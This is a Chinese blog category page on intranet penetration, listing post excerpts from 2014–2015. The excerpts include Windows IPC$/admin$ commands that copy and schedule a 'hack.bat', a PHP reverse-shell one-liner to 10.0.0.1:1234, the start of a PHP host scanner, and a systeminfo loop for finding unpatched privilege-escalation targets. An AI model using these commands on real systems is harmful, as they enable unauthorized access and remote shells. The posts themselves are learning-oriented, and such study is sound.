内网渗透
关注
分享
扫一扫
文章平均质量分 68
eT48_Sec
这个作者很懒,什么都没留下…
展开
-
几条命令-可能有些古董
几条命令,可能有些古董。 ipconfig ping 192.168.1.104 nc -v -z -w 5 192.168.1.104 139 445 net use \\192.168.1.104\ipc$ "test" /user:"test" copy hack.bat \\192.168.1.104\admin$ net time \\192.168.1.104 at原创 2014-12-27 22:28:53 · 526 阅读 · 0 评论 -
一条命令引发的思考
这条命令是 php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &3 2>&3");' 作用是反弹一个交互式的shell 代码看得不太懂,所以很有必要了解一下。 -i interactive Force the shell to behave interactively. 文件描述符 0 stdin原创 2015-02-10 22:14:24 · 471 阅读 · 0 评论 -
PHP扫描内网存活主机
直接上代码 <?PHP header('Content-Type: text/html; charset=utf-8'); error_reporting(0); function ping($host, $timeout = 1) { $package = "\x08\x00\x7d\x4b\x00\x00\x00\x00PingHost"; $socket = socket_原创 2015-02-01 22:27:28 · 1931 阅读 · 0 评论 -
利用systeminfo命令查找可用的windows提权EXP
利用systeminfo命令查找可用的windows提权EXP,输出的即为未打补丁的漏洞。 文章根据网络上的相关内容做了一点修改(更新) systeminfo>tmp.txt&(for /f %i in (MS.txt) do @type tmp.txt|@find /i "%i"||@echo %i)&del /f /q tmp.txt MS.txt中的内容为:转载 2015-03-30 17:38:52 · 4709 阅读 · 0 评论